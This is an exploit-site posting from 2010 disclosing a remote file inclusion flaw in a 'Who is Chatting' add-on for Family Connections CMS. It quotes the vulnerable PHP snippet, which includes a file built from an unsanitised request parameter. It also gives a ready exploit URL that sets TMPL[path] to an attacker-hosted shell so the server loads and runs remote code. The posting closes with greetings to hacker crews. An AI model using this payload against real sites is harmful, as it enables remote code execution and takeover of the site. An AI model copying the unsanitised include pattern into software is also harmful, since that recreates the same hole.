id: 13091
date: 07/03/2010
title: Family Connections Who is Chatting Add-On Remote File Inclusion
author: lumut--
cves: 

===============================================================
Family Connections Who is Chatting Add-On Remote File Inclusion
===============================================================


# Author         : lumut--

# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs           :

<?
$chat_inc = $TMPL['path'] . "inc/chatting_inc.php";

include_once ($chat_inc);
?>

# Expl: http://cms.com/mod_chatting/themes/default/header.php?TMPL[path]=[shell]

# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet, manadocoding



#  0day.today [2023-03-26]  #